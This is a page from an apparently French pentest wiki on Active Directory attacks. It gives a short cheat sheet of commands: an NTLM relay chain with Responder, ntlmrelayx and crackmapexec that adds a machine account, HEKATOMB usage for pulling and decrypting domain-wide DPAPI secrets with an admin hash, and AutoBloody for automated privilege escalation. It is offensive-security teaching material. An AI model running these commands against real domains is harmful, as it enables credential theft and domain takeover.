Pentest & Bug Bounty
  • ๐ŸฅทPentest et Bug Bounty
    • ๐Ÿ‘พPentest Methodology
    • ๐Ÿ’ธBug Bounty Methodology
      • ๐Ÿ““Ecrire un bon rapport
      • โš–๏ธAspect Juridique (FR)
  • ๐Ÿ‘ฃOSINT / Recon
    • ๐ŸงฆSock Puppet
    • ๐Ÿง Mindmaps
    • ๐ŸขEntreprise
    • ๐Ÿ‘€Leaks
    • ๐Ÿ‘ŠManuel / Dorks
      • Google dorks
      • Github dorks
      • Twitter Dorks
      • Shodan Dorks
    • ๐Ÿ‘ฅRรฉseaux sociaux (SOCMINT)
      • ๐Ÿ•ต๏ธTelegram OSINT
      • ๐Ÿ‘ปSnapchat OSINT
      • ๐Ÿคตโ€โ™‚๏ธLinkedin OSINT
      • ๐Ÿ—ฃ๏ธFacebook OSINT
      • ๐ŸŽผTik tok OSINT
      • ๐Ÿ“ทInstagram OSINT
      • ๐ŸฆTwitter OSINT
      • ๐Ÿ”ŠDiscord OSINT
    • ๐Ÿ–‡๏ธDomaines et Sous-domaines
    • ๐ŸšชScan de ports / web
    • โœ‰๏ธEmails
    • ๐Ÿ”—Rรฉseau
    • ๐Ÿ“ทScreenshots
    • ๐Ÿ“นLive camera
    • ๐Ÿง”Reconnaissance faciale / images
    • ๐ŸŒ†Images
    • ๐Ÿ—บ๏ธMaps
    • ๐Ÿ‘๏ธActive Directory
    • โ˜๏ธCloud
    • Autre
  • ๐ŸŒPentest Web
    • โœŠBrute force / Fuzzing
    • ๐Ÿ’‰Injections
      • ๐ŸชXSS
        • PDF injection
      • ๐Ÿ“„HTMLi
      • ๐Ÿ“ƒXXE
      • 7๏ธโƒฃSSTI
      • ๐Ÿ”ขSQLi
        • ๐Ÿ‘ซUNION based
        • โณTime based
        • ๐ŸฅฝBoolean based / Error Based
        • ๐Ÿ“คOut-Of-Band
      • โ†ฉ๏ธCRLF
      • ๐ŸšOS injection
      • โ˜•Log4Shell
      • ๐Ÿฅ CSV
      • ๐ŸปESI
      • ๐Ÿ˜ŽXSLT
      • ๐Ÿ’ŒInjections dans emails
      • ๐Ÿ”€ELi
        • OGNLi
    • โ†ช๏ธOpen redirect
    • ๐Ÿ“Path Traversal / LFI / RFI
    • ๐Ÿ”“Bypass
      • ใ€ฐ๏ธWAF / Filter bypass
      • 2๏ธ2FA
    • โ˜ ๏ธCharges utiles
    • ๐Ÿ“šCMS (Content Management System)
      • WordPress
      • Joomla!
      • Magento
      • Drupal
    • ๐ŸŽญSOP bypass
      • CORS
      • postMessage()
      • JSONP
    • ๐Ÿ–ฑ๏ธClickjacking
    • โš™๏ธInsecure deserialization
    • โ˜ฃ๏ธWeb Cache Poisoning / Deception
    • ๐ŸคHTTP Smuggling
    • ๐Ÿ‘‹OAuth
    • โ›”SAML
    • ๐Ÿ—๏ธJSON Web Token
    • ๐ŸŽฃCSRF
      • ๐Ÿš€Cross-site WebSocket Hijacking (CSWSH)
    • ๐ŸŽฏIDOR
    • ๐Ÿ•น๏ธSSRF
      • Cloud SSRF
      • Protocol Smuggling
    • โš™๏ธAPIs
      • ๐Ÿฝ๏ธREST
      • ๐Ÿ“ถGraphQL
    • โ“Mot de passe oubliรฉ
    • ๐Ÿ›’Fonctions d'achat et de facturation
    • ๐Ÿ‘ฝBroken authentication / register
    • ๐ŸPanneaux d'administration
    • โฌUpload features
    • ๐Ÿ”—Broken Link Hijacking
    • ๐ŸŽฎPrise de contrรดle de sous-domaine
    • ๐Ÿ›‚Prise de contrรดle de DNS
    • โ˜๏ธOne liners
    • ๐ŸšงMisconfigurations
    • ๐Ÿ—ฟAnalyse statique
      • PHP
      • Ruby On Rails
      • Perl
      • JAVA
      • Javascript
      • Python
      • Golang
      • .NET
    • ๐ŸชฃAWS S3
    • ๐Ÿค–Captcha
    • ๐ŸชžRace conditions
    • โ˜„๏ธ.git exposรฉ
    • ๐Ÿ’ญBusiness logic
    • ๐ŸฅกPrototype pollution
    • ๐Ÿ’ฃDependency confusion
    • ๐Ÿ›‘DoS
      • ๐ŸคฏReDoS
      • ๐Ÿ‘Hash flooding
      • ๐ŸงจCookie bomb
    • Autre
      • Flask
      • Symphony
      • Spring Boot
      • Django
      • Jenkins
  • ๐ŸŒฉ๏ธPentest Cloud
    • IaC (Infrastructure as Code)
      • Terraform
      • Helm
      • Kustomize
    • AWS
      • Enumeration
    • Azure
      • Entra ID
      • Azure Resource Manager (ARM)
        • Enumeration
    • GCP
      • GCP IAM
      • Authentification
      • Enumeration
    • Kubernetes
  • ๐Ÿ•ธ๏ธPentest Rรฉseau
    • ๐ŸชกProtocoles rรฉseau
    • ๐Ÿ“กWifi
    • ๐Ÿ”‹BLE
    • ๐Ÿ“VPN
  • ๐Ÿ—‚๏ธPentest AD
    • ๐Ÿ‘บGPP
    • โžก๏ธMouvements latรฉraux
      • ๐Ÿ”ชPass The Hash
      • ๐Ÿ—ก๏ธOver Pass The Hash
    • ๐Ÿ“œADCS
  • ๐Ÿ“ฑPentest Mobile
    • ๐Ÿค–Android
      • ๐Ÿ‘พMรฉthodologie
      • ๐ŸŒณSetup environnement
      • ๐Ÿ“œSSL pinning bypass
      • ๐Ÿ‡Collecte d'informations
      • ๐Ÿ” Enumeration des donnรฉes locales
      • ๐Ÿ”™Reverse engineering
        • ๐ŸชขDรฉ-obfuscation
      • โ›ฐ๏ธAnalyse statique (Android)
      • ๐ŸžDebug
      • ๐ŸŽฐStockage de donnรฉes non sรฉcurisรฉ
        • ๐Ÿ“ฐLogs
        • ๐ŸคShared Preferences
        • ๐Ÿ”คStrings
        • ๐Ÿ—„๏ธSQLite DB
        • ๐Ÿ—ƒ๏ธRealm DB
        • ๐Ÿง Mรฉmoire
        • ๐Ÿ“Copy/Paste buffer caching
        • โŒจ๏ธKeyboard press caching
        • ๐Ÿ”™Backup
      • ๐ŸŒฉ๏ธFirebase/Appspot misconfig
      • ๐Ÿ”—Deeplinks vulns
        • Interception de contenu
        • WebView hijacking (via deeplink)
        • Invalid Digital assets links
      • ๐Ÿ–ผ๏ธWebView vulns
        • WebView Hijacking
        • Exfiltration de donnรฉes
        • RXSS
        • Vol de token
      • Guides outils
        • โ›๏ธOutil Drozer
          • Injections SQL (Android)
          • Path traversal (Android)
        • ๐Ÿ”ฌOutil Objection
        • ๐ŸชOutil Frida
        • Outil Medusa / Mango
      • ๐Ÿ“ฒContournement de dรฉtection d'emulateur
        • ๐Ÿ“‚Fichiers d'emulateurs
        • ๐Ÿ™‹โ€โ™‚๏ธNetwork Operator Name
      • ๐ŸฆทContournement des dรฉtections de rootage
        • ๐ŸงฎRoot management
        • ๐Ÿ—๏ธClรฉ de signature du noyau
        • ๐ŸงŠProps dangereux
        • ๐Ÿฆธโ€โ™‚๏ธBinaire "su"
        • โŒPermissions sur les repertoires
      • โ˜๏ธContournement des protections biometriques
      • ๐Ÿ”ณLecteur de code QR/EAN/Barres...
      • ๐Ÿ’”Injection de backdoor
      • ๐ŸชงTask hijacking
      • ๐ŸŽญOverlay attacks
        • Tapjacking
        • Invisible Keyboard
      • ๐Ÿ“ตRรฉsilience
        • โŒจ๏ธThird Party Keyboards
        • ยฉ๏ธAllowed Copy/Paste on sensitive fields
        • ๐Ÿ›ค๏ธBackground screen caching
        • ๐Ÿ–‹๏ธSchรฉmas de signature
        • โฌ†๏ธIn-App updates
      • ๐ŸคฏCorruption de Mรฉmoire
    • ๐ŸiOS
      • ๐Ÿฅ…Mรฉthodologie
      • ๐ŸงฑSetup environnement (iOS)
      • โฎ๏ธReverse engineering (iOS)
      • ๐Ÿ”๏ธAnalyse statique (iOS)
      • ๐ŸงฟContournement de dรฉtection de Jailbreak
      • ๐Ÿ“ŒSSL pinning bypass (iOS)
      • ๐Ÿ‘‡Contournement d'authentification biomรฉtrique
      • ๐Ÿ›Contournement d'anti-Hooking/Debugging
      • ๐Ÿ™ˆStockage de donnรฉes non sรฉcurisรฉ (iOS)
        • ๐Ÿ’ญMรฉmoire (iOS)
        • ๐Ÿ“Copy/Paste buffer caching (iOS)
        • ๐ŸชCookies (iOS)
        • ๐Ÿ—ž๏ธLogs (iOS)
        • โŒจ๏ธCache du clavier (IOS)
        • Backup (IOS)
      • ๐Ÿ“ฑBackground screen caching
      • ๐Ÿง‘โ€๐Ÿš€WebView vulns (iOS)
      • Deeplinks vulns (iOS)
      • Lecteur de code QR
      • Firebase misc
  • ๐Ÿ‘ทPentest physique
    • ๐Ÿ”Crochetage
    • ๐Ÿ’ณRFID
    • โš™๏ธEquipements
    • ๐Ÿ’พHardware Hacking
      • ๐Ÿ“ˆUART
      • ๐ŸงชJTAG
      • โšกSWD
      • ๐ŸชขSPI
      • ๐ŸšŒIยฒC
      • ๐Ÿ”ดFault Injection
      • Side-Channel Attacks
    • ๐ŸฃFirmware hacking
  • ๐Ÿ–จ๏ธPentest IoT
    • โชReplay de stream camera
    • ๐Ÿ—ฃ๏ธAssistants vocaux
    • ๐Ÿ“นCamera IP
    • โฌ‡๏ธDoS
    • ๐Ÿ–จ๏ธImprimantes
    • ๐ŸŽฌChromecast
  • ๐Ÿ’€Hacking protocols
    • ๐Ÿ˜ฉTelnet - port 23
    • ๐Ÿ”SSH - port 22
    • ๐Ÿ“คFTP - port 21
    • โ”Whois - port 43
    • ๐Ÿ‘‰DNS - port 53
    • ๐Ÿ•โ€๐ŸฆบKerberos - port 88
    • ๐Ÿ’ผSNMP - ports 161-162
    • ๐Ÿ“จSMB - ports 445-139
    • ๐Ÿ“งSMTP - ports 25-587
    • ๐ŸŽฆRTSP - port 554
    • ๐Ÿ”ŽMS-RPC - ports 135-593
    • โž•Rsync - port 873
    • ๐Ÿ”ขMS-SQL - port 1433
    • ๐Ÿ—๏ธDocker - port 2375
    • ๐Ÿ”กMySQL - port 3306
    • ๐Ÿ“LDAP - ports 389, 636, 3268, 3269
    • ๐Ÿ–ฅ๏ธRDP - port 3389
    • โŒจ๏ธVNC - ports 5800,5801,5900,5901
  • ๐Ÿ˜ˆIngรฉnierie sociale
    • ๐Ÿง Concepts / Principes / Attaques
    • ๐ŸชงEthique
    • ๐Ÿ‘คProfils comportementaux
  • ๐Ÿ”“Crack
  • ๐Ÿ› ๏ธAutres outils utiles
    • ๐ŸšฟSandbox / Sanitizer
    • ๐Ÿ”คGรฉnรฉrateurs de wordlists personnalisรฉes
  • ๐ŸŒœPost-Exploitation
    • ๐Ÿ‘”ร‰numรฉration /ร‰lรฉvation de privilรจges
      • ๐ŸงLinux
        • CVE-2022-0847 (Dirty Pipe)
        • CVE 2021-4034 (PwnKit)
        • CVE 2021-3560 (Polkit)
      • ๐ŸชŸWindows
        • ๐Ÿ–จ๏ธPrintNightmare
        • ๐Ÿ–จ๏ธSpoolFool
        • ๐Ÿ†”Usurpation de SAMAccountName
        • โฒ๏ธScheduled task/job (T1573.005)
        • ๐ŸHiveNightmare
        • ๐Ÿ”‘Stored Credentials
        • ๐ŸŽฉSeImpersonatePrivilege
        • ๐ŸŽ’SeBackupPrivilege
        • ๐ŸžUnquoted Service Path
        • ๐ŸงฉDLL Hijacking
        • ยฉ๏ธSeBackupPrivilege
      • โ›ด๏ธDocker
    • ๐Ÿ‘ปEffacement des traces
    • โš“Persistance / Downloaders
    • ๐Ÿ›ก๏ธDefense evasion
    • ๐Ÿ“ฆExfiltration de Donnรฉes
  • ๐Ÿ”ŽForensic
    • ๐Ÿ’กMรฉthodologie
    • ๐Ÿ“บLive forensic
    • ๐Ÿ’ปMรฉmoire non volatile
    • ๐Ÿ•Š๏ธMรฉmoire volatile
    • ๐Ÿ“„File forensic
Propulsรฉ par GitBook
Sur cette page
  • Cheat Sheet
  • Responder+ntlmrelayx+cme chaining
  • PoC
  • HEKATOMB
  • AutoBloody
  • Ressources

Cet article vous a-t-il รฉtรฉ utile ?

Pentest AD

Techniques de piratage d'Active Directory

PrรฉcรฉdentVPNSuivantGPP

Derniรจre mise ร  jour il y a 1 mois

Cet article vous a-t-il รฉtรฉ utile ?

Cheat Sheet

Responder+ntlmrelayx+cme chaining

PoC

  • Responder -I eth0 -rPvd

  • ntlmrelayx -smb2support --smb-add-computer <fake pc> -t <domain controler> --no-http-server --no-wcf-server --no-raw-server

  • cme smb <ip> -u <fake pc> -p <generated password>

HEKATOMB

Hekatomb est un script python qui se connecte ร  l'annuaire LDAP pour rรฉcupรฉrer toutes les informations des ordinateurs et des utilisateurs. Ensuite, il tรฉlรฉchargera tous les blob DPAPI de tous les utilisateurs de tous les ordinateurs et utilisera les clรฉs de sauvegarde du domaine pour les dรฉchiffrer.

Exemple d'utilisation:

$ python3 hekatomb.py -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp

ressource: https://github.com/Processus-Thief/HEKATOMB

AutoBloody

AutoBloody est un outil permettant d'exploiter automatiquement les chemins d'escalade de privilรจges Active Directory indiquรฉs par BloodHound

Exemple d'utilisation:

$ autobloody -u <utilisateur> -p '<mot de passe>' --host <Domain Controller> -dp '<mdp Neo4J>' -ds '<DB source>' -dt '<DB target>'

ressource: https://github.com/CravateRouge/autobloody

Ressources

  • https://wadcoms.github.io/

  • https://www.ired.team/

๐Ÿ—‚๏ธ
Page cover image
AD pentesting mindmap v1
AD Pentesting mindmap v2